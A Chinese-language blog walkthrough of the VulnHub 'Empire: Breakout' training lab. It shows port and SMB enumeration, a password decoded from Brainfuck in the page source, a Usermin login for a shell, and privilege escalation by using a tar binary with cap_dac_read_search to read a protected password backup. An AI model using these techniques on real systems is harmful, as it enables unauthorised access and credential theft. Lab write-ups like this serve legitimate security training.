靶场下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
一、主机发现+信息收集
(一)信息收集
(二)环境变量设置
export ip=192.168.1.131
(三)端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 10000/tcp open snet-sensor-mgmt 20000/tcp open dnp MAC Address: 00:0C:29:9F:48:84 (VMware)
(四)服务信息收集
nmap -sS -sV -O -p80,139,445,10000,20000 $ip
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.51 ((Debian)) 139/tcp open netbios-ssn Samba smbd 4 445/tcp open netbios-ssn Samba smbd 4 10000/tcp open http MiniServ 1.981 (Webmin httpd) 20000/tcp open http MiniServ 1.830 (Webmin httpd) MAC Address: 00:0C:29:9F:48:84 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop
(五)默认脚本扫描
nmap --script=vuln -p80,139,445,10000,20000 $ip
┌──(root㉿kali)-[/home/kali] └─# nmap --script=vuln -p80,139,445,10000,20000 $ip Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 03:26 EDT Nmap scan report for 192.168.1.131 Host is up (0.00029s latency). PORT STATE SERVICE 80/tcp open http |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.131 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.1.131:80/manual/es/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/pt-br/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/da/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/fr/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/de/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/zh-cn/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/ru/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/tr/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/ja/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/en/index.html | Form id: | Form action: https://www.google.com/search | | Path: http://192.168.1.131:80/manual/ko/index.html | Form id: |_ Form action: https://www.google.com/search | http-enum: |_ /manual/: Potentially interesting folder |_http-dombased-xss: Couldn't find any DOM based XSS. 139/tcp open netbios-ssn 445/tcp open microsoft-ds 10000/tcp open snet-sensor-mgmt | http-vuln-cve2006-3392: | VULNERABLE: | Webmin File Disclosure | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2006-3392 | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. | This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences | to bypass the removal of "../" directory traversal sequences. | | Disclosure date: 2006-06-29 | References: | http://www.exploit-db.com/exploits/1997/ | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392 20000/tcp open dnp MAC Address: 00:0C:29:9F:48:84 (VMware) Host script results: |_smb-vuln-ms10-054: false |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9] |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
二、开始渗透
(一)80端口Web应用
nday
searchsploit Apache 2.4.51
没有历史漏洞
页面访问
是建站首页,没啥用,看眼源码有信息,直接上目录爆破
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
被查出是 Brainfuck 代码编程语言
https://www.splitbrain.org/services/ook
用上面这个在线网站就可以进行在线解密,结果如下
.2uqPEfj3D<P'a-3
目录爆破(+挂上代理爆破目录)
dirsearch -u http://192.168.1.131/
[03:50:43] 301 - 315B - /manual -> http://192.168.1.131/manual/ [03:50:43] 200 - 208B - /manual/index.html
或者
(二)139端口与445端口SMB服务
信息收集
enum4linux -a 192.168.1.131
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Apr 3 09:47:43 2025 =========================================( Target Information )========================================= Target ........... 192.168.1.131 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===========================( Enumerating Workgroup/Domain on 192.168.1.131 )=========================== [+] Got domain/workgroup name: WORKGROUP ===============================( Nbtstat Information for 192.168.1.131 )=============================== Looking up status of 192.168.1.131 BREAKOUT <00> - B <ACTIVE> Workstation Service BREAKOUT <03> - B <ACTIVE> Messenger Service BREAKOUT <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ===================================( Session Check on 192.168.1.131 )=================================== [+] Server 192.168.1.131 allows sessions using username '', password '' ================================( Getting domain SID for 192.168.1.131 )================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ==================================( OS information on 192.168.1.131 )================================== [E] Can't get OS info with smbclient [+] Got OS info for 192.168.1.131 from srvinfo: BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian platform_id : 500 os version : 6.1 server type : 0x809a03 =======================================( Users on 192.168.1.131 )======================================= Use of uninitialized value $users in print at ./enum4linux.pl line 972. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975. Use of uninitialized value $users in print at ./enum4linux.pl line 986. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988. =================================( Share Enumeration on 192.168.1.131 )================================= smbXcli_negprot_smb1_done: No compatible protocol selected by server. Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.13.5-Debian) Reconnecting with SMB1 for workgroup listing. Protocol negotiation to server 192.168.1.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available [+] Attempting to map shares on 192.168.1.131 //192.168.1.131/print$ Mapping: DENIED Listing: N/A Writing: N/A [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* //192.168.1.131/IPC$ Mapping: N/A Listing: N/A Writing: N/A ===========================( Password Policy Information for 192.168.1.131 )=========================== [+] Attaching to 192.168.1.131 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] BREAKOUT [+] Builtin [+] Password Info for Domain: BREAKOUT [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ======================================( Groups on 192.168.1.131 )====================================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ==================( Users on 192.168.1.131 via RID cycling (RIDS: 500-550,1000-1050) )================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password '' S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User) S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group) [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\cyber (Local User) ===============================( Getting printer info for 192.168.1.131 )=============================== No printers returned. enum4linux complete on Thu Apr 3 09:47:56 2025
找到用户信息 cyber
尝试匿名登录
smbclient -L //192.168.1.131 -N
smbmap -H 192.168.1.131
尝试Nday
searchsploit Samba 4.13.5-Debian
没有结果
(三)10000端口和20000端口
这里是Usemin登录界面
这里是Webmin登录界面
我们现在有密码和账号
cyber/ .2uqPEfj3D<P'a-3
尝试进行登录成功登录进入了Usermin页面
三、获得初始权限
我们登录进入之后直接获得了可命令执行的权限
这里还是好用的交互式终端
四、提权
低权限用户信息收集
[cyber@breakout ~]$[cyber@breakout~]$ ls -liah total 568K 790814 drwxr-xr-x 8 cyber cyber 4.0K Apr 3 10:11 . 783372 drwxr-xr-x 3 root root 4.0K Oct 19 2021 .. 791181 prw-r--r-- 1 cyber cyber 0 Apr 3 10:11 backpipe 791183 -rw------- 1 cyber cyber 0 Oct 20 2021 .bash_history 790817 -rw-r--r-- 1 cyber cyber 220 Oct 19 2021 .bash_logout 790816 -rw-r--r-- 1 cyber cyber 3.5K Oct 19 2021 .bashrc 790841 drwxr-xr-x 2 cyber cyber 4.0K Oct 19 2021 .filemin 790838 drwx------ 2 cyber cyber 4.0K Oct 19 2021 .gnupg 790853 drwxr-xr-x 3 cyber cyber 4.0K Oct 19 2021 .local 790815 -rw-r--r-- 1 cyber cyber 807 Oct 19 2021 .profile 790830 drwx------ 2 cyber cyber 4.0K Oct 19 2021 .spamassassin 791179 -rwxr-xr-x 1 root root 520K Oct 19 2021 tar 790836 drwxr-xr-x 2 cyber cyber 4.0K Oct 20 2021 .tmp 790822 drwx------ 17 cyber cyber 4.0K Apr 3 10:02 .usermin 790857 -rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt [cyber@breakout ~]$[cyber@breakout~]$ cat user.txt 3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
除了此处的user的flag我们还得到一个可执行文件tar
[cyber@breakout ~]$[cyber@breakout~]$ ./tar ./tar: You must specify one of the '-Acdtrux', '--delete' or '--test-label' options Try './tar --help' or './tar --usage' for more information. [cyber@breakout ~]$[cyber@breakout~]$ ./tar --usage Usage: tar [-AcdrtuxGnSkUWOmpsMBiajJzZhPlRvwo?] [-g FILE] [-C DIR] [-T FILE] [-X FILE] [-f ARCHIVE] [-F NAME] [-L NUMBER] [-b BLOCKS] [-H FORMAT] [-V TEXT] [-I PROG] [-K MEMBER-NAME] [-N DATE-OR-FILE] [--catenate] [--concatenate] [--create] [--delete] [--diff] [--compare] [--append] [--test-label] [--list] [--update] [--extract] [--get] [--check-device] [--listed-incremental=FILE] [--incremental] [--hole-detection=TYPE] [--ignore-failed-read] [--level=NUMBER] [--no-check-device] [--no-seek] [--seek] [--occurrence[=NUMBER]] [--sparse-version=MAJOR[.MINOR]] [--sparse] [--add-file=FILE] [--directory=DIR] [--exclude=PATTERN] [--exclude-backups] [--exclude-caches] [--exclude-caches-all] [--exclude-caches-under] [--exclude-ignore=FILE] [--exclude-ignore-recursive=FILE] [--exclude-tag=FILE] [--exclude-tag-all=FILE] [--exclude-tag-under=FILE] [--exclude-vcs] [--exclude-vcs-ignores] [--no-null] [--no-recursion] [--no-unquote] [--no-verbatim-files-from] [--null] [--recursion] [--files-from=FILE] [--unquote] [--verbatim-files-from] [--exclude-from=FILE] [--anchored] [--ignore-case] [--no-anchored] [--no-ignore-case] [--no-wildcards] [--no-wildcards-match-slash] [--wildcards] [--wildcards-match-slash] [--keep-directory-symlink] [--keep-newer-files] [--keep-old-files] [--no-overwrite-dir] [--one-top-level[=DIR]] [--overwrite] [--overwrite-dir] [--recursive-unlink] [--remove-files] [--skip-old-files] [--unlink-first] [--verify] [--ignore-command-error] [--no-ignore-command-error] [--to-stdout] [--to-command=COMMAND] [--atime-preserve[=METHOD]] [--clamp-mtime] [--delay-directory-restore] [--group=NAME] [--group-map=FILE] [--mode=CHANGES] [--mtime=DATE-OR-FILE] [--touch] [--no-delay-directory-restore] [--no-same-owner] [--no-same-permissions] [--numeric-owner] [--owner=NAME] [--owner-map=FILE] [--preserve-permissions] [--same-permissions] [--same-owner] [--sort=ORDER] [--preserve-order] [--same-order] [--acls] [--no-acls] [--no-selinux] [--no-xattrs] [--selinux] [--xattrs] [--xattrs-exclude=MASK] [--xattrs-include=MASK] [--force-local] [--file=ARCHIVE] [--info-script=NAME] [--new-volume-script=NAME] [--tape-length=NUMBER] [--multi-volume] [--rmt-command=COMMAND] [--rsh-command=COMMAND] [--volno-file=FILE] [--blocking-factor=BLOCKS] [--read-full-records] [--ignore-zeros] [--record-size=NUMBER] [--format=FORMAT] [-- gnu] [-- oldgnu] [-- pax] [-- posix] [-- ustar] [-- v7] [--old-archive] [--portability] [--pax-option=keyword[[:]=value][,keyword[[:]=value]]...] [--posix] [--label=TEXT] [--auto-compress] [--use-compress-program=PROG] [--bzip2] [--xz] [--lzip] [--lzma] [--lzop] [--no-auto-compress] [--zstd] [--gzip] [--gunzip] [--ungzip] [--compress] [--uncompress] [--backup[=CONTROL]] [--hard-dereference] [--dereference] [--starting-file=MEMBER-NAME] [--newer-mtime=DATE] [--newer=DATE-OR-FILE] [--after-date=DATE-OR-FILE] [--one-file-system] [--absolute-names] [--suffix=STRING] [--strip-components=NUMBER] [--transform=EXPRESSION] [--xform=EXPRESSION] [--checkpoint[=NUMBER]] [--checkpoint-action=ACTION] [--full-time] [--index-file=FILE] [--check-links] [--no-quote-chars=STRING] [--quote-chars=STRING] [--quoting-style=STYLE] [--block-number] [--show-defaults] [--show-omitted-dirs] [--show-snapshot-field-ranges] [--show-transformed-names] [--show-stored-names] [--totals[=SIGNAL]] [--utc] [--verbose] [--warning=KEYWORD] [--interactive] [--confirmation] [--help] [--restrict] [--usage] [--version] [FILE]...
我们可以使用getcap命令查看权限
[cyber@breakout ~]$[cyber@breakout~]$ getcap /home/cyber/tar /home/cyber/tar cap_dac_read_search=ep
并且发现有cap_dac_read_search权限,任何用户都能用该程序打包自己没有read权限的文件,并且查看
正常思路是查看/etc/shadow文件,然后爆破密钥获得root密码,但这里实在爆破不出来
只能继续找敏感信息文件,这里在/var/backups中找到
var/backups/.old_pass.bak文件
这里没有权限,找个有权限的目录/tmp
cd /tmp
1、打包:/home/cyber/tar -cvf 1.tar /var/backups/.old_pass.bak
ls 可以查看是否创建了 1.tar
2、解包:/home/cyber/tar -xvf 1.tar
3、查看:cat /tmp/var/backups/.old_pass.bak 这里也是成功拿到了密码
Ts&4&YurgtRX(=~h
五、提权成功
我们虽然拿到密码但是su和sudo的权限全被锁了,我们需要想什么可以利用的
这里我们还是用Web页面进行root登录,看看是不是root权限,先退出cyber用户,然后再登录root用户
root
Ts&4&YurgtRX(=~h
提权成功
- THE END -
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/empire-breakout%e9%9d%b6%e5%9c%ba%e7%bb%83%e4%b9%a0/
共有 0 条评论